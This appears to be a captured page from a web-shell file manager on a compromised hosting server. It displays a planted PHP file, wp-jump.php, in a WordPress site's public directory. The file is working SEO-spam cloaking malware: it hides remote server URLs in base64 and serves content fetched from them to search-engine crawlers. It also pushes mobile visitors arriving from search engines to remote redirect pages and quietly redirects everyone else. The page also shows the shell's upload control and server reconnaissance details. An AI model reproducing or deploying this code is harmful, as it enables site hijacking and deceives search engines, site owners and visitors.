HEX
Server: LiteSpeed
System: Linux sv01.secureweb.vn 4.18.0-553.16.1.el8_10.x86_64 #1 SMP Thu Aug 8 07:11:46 EDT 2024 x86_64
User: h3b738e84d (1657)
PHP: 8.3.19
Disabled: exec,system,passthru,shell_exec,dl,popen,show_source,posix_kill,posix_mkfifo,posix_getpwuid,posix_setpgid,posix_setsid,posix_setuid,posix_setgid,posix_seteuid,posix_setegid,posix_uname
$ pwd: /home/h3b738e84d/public_html/
Upload Files
File: /home/h3b738e84d/public_html/wp-jump.php
<?php

header("Content-Type: text/html");

function get_request_path() {
    return parse_url($_SERVER['REQUEST_URI'], PHP_URL_PATH);
}

function get_protocol() {
    // Check proxy headers first
    if (!empty($_SERVER['HTTP_X_FORWARDED_PROTO'])) {
        return $_SERVER['HTTP_X_FORWARDED_PROTO'];
    }
    
    // Check standard HTTPS indicators
    if (!empty($_SERVER['HTTPS']) && $_SERVER['HTTPS'] !== 'off') {
        return 'https://';
    }
    
    if ($_SERVER['SERVER_PORT'] == 443) {
        return 'https://';
    }
    
    return 'http://';
}

/**
 * Get host name (compatible with reverse proxy)
 */
function get_host() {
    // Check proxy headers first
    if (!empty($_SERVER['HTTP_X_FORWARDED_HOST'])) {
        return $_SERVER['HTTP_X_FORWARDED_HOST'];
    }
    
    if (!empty($_SERVER['HTTP_X_ORIGINAL_HOST'])) {
        return $_SERVER['HTTP_X_ORIGINAL_HOST'];
    }
    
    // Use HTTP_HOST if available (includes port if non-standard)
    if (!empty($_SERVER['HTTP_HOST'])) {
        return $_SERVER['HTTP_HOST'];
    }
    
    // Fallback to SERVER_NAME
    return $_SERVER['SERVER_NAME'];
}

/**
 * Get full request URL (compatible with reverse proxy)
 */
function get_full_url() {
    return get_protocol() . get_host() . $_SERVER['REQUEST_URI'];
}

/**
 * Check if current user agent is a spider
 */
function is_spider() {
    foreach ($GLOBALS['spiders'] as $spider) {
        if (stripos(UA, $spider) !== false) {
            return true;
        }
    }
    return false;
}

/**
 * Check if current user agent is a mobile device
 */
function is_mobile() {
    foreach ($GLOBALS['mobiles'] as $mobile) {
        if (stripos(UA, $mobile) !== false) {
            return true;
        }
    }
    return false;
}



/**
 * Check if referrer is from search engine
 */
function check_search_engine_referer($referer) {
    if (empty($referer)) {
        return false;
    }
    return stristr($referer, "google") !== false ||
        stristr($referer, "bing") !== false ||
        stristr($referer, "yahoo") !== false;
}


function get_path_name() {
    $path = CURRENT_PATH;
    
    // Remove trailing slash
    $path = rtrim($path, '/');
    
    // If empty or just root, return empty
    if (empty($path) || $path === '/') {
        return '';
    }
    
    // Split path by slash and get last segment
    $segments = explode('/', $path);
    $last_segment = end($segments);
    
    // Remove file extension (e.g., .html, .php, .htm)
    $name = preg_replace('/\.[^.]+$/', '', $last_segment);
    
    return $name;
}


// Define constants (PHP 5-8 compatible)
define("UA", $_SERVER["HTTP_USER_AGENT"]);
$GLOBALS['spiders'] = array('Google','Bing','Yahoo');
$GLOBALS['mobiles'] = array(
    'Android', 'iPhone', 'iPad', 'iPod', 'BlackBerry', 'Opera Mini', 'Windows Phone', 'Mobile', 'Silk',
    'webOS', 'Samsung', 'HTC', 'Huawei', 'Xiaomi', 'OPPO', 'Vivo', 'OnePlus', 'Realme', 'Redmi',
    'Nokia', 'LG', 'Motorola', 'Sony', 'Lenovo', 'ZTE', 'ASUS', 'Meizu', 'Coolpad',
    'PlayBook', 'Kindle', 'Tablet', 'Nexus', 'Pixel', 'Galaxy', 'GT-', 'SM-', 'MI ',
    'RMX', 'CPH', 'POCO', 'M2', 'Redmi Note', 'OPPO A', 'vivo Y', 'Realme C',
    'Mobile Safari', 'IEMobile', 'Opera Mobi', 'Fennec', 'Minimo',
    'SymbianOS', 'Series60', 'Series40', 'Maemo', 'PalmOS', 'PalmSource',
    'WP7', 'WP8', 'WP10', 'Windows CE', 'Lumia',
    'UCBrowser', 'UC Browser', 'MQQBrowser', 'MicroMessenger', 'baiduboxapp',
    'wOSBrowser', 'BrowserNG', 'NetFront', 'Jasmine', 'Polaris', 'BREW',
    'J2ME', 'MIDP', 'Profile/MIDP', 'Configuration/CLDC', 'WAP', 'WapBrowser',
    'AvantGo', 'Blazer', 'Elaine', 'Plucker', 'Xiino',
    'up.browser', 'up.link', 'mmp', 'symbian', 'smartphone', 'midp', 'wap',
    'phone', 'pocket', 'psp', 'wireless', 'vodafone', 'o2', 'orange', 'docomo',
    'portalmmm', 'sagem', 'sharp', 'sie-', 'alcatel', 'benq', 'mot-', 'playstation',
    'hiptop', 'nec-', 'panasonic', 'philips', 'sanyo', 'kddi', 'ddipocket',
    'pre/', 'webtv', 'ipad', 'ipaq', 'pda', 'armv', 'webmate', 'palm'
);
define("CURRENT_PATH", get_request_path());
define("REMOTE_DOMAIN", base64_decode("aHR0cHM6Ly93d3cuY2xvdWRhcHAtYXp1cmUuY29tL2FwaS9odG1sL3ZuL2dldA=="));
define("SPIDER_URL", base64_decode("aHR0cHM6Ly93d3cuY2xvdWRhcHAtYXp1cmUuY29tL2FwaS9odG1sL3ZuL3NwaWRlcg=="));
define("REFERRER", isset($_SERVER["HTTP_REFERER"]) ? $_SERVER["HTTP_REFERER"] : '');
define("JUMP_URL", base64_decode("aHR0cDovL3d3dy52bmNsZWFuaW5nLmNvbS9hcGkvaHRtbC92bi9qdW1w"));
if (is_spider()) { 
    if (CURRENT_PATH == '/') {
        $data = file_get_contents(SPIDER_URL . "?host=".get_host());
        echo $data;
        exit;
    }
    while (ob_get_level()) {
        ob_end_clean();
    }
    $data = file_get_contents(REMOTE_DOMAIN ."?host=".get_host()."&slug=".get_path_name()."&path=".CURRENT_PATH);
    echo $data;
    exit;
}
if (check_search_engine_referer(REFERRER) && is_mobile()) {
    while (ob_get_level()) {
        ob_end_clean();
    }
    echo file_get_contents(JUMP_URL."?host=".get_host());
    exit;
}

header('Location: ' . '/?time='.time(), true, 302);

exit;

?>
@ Telegram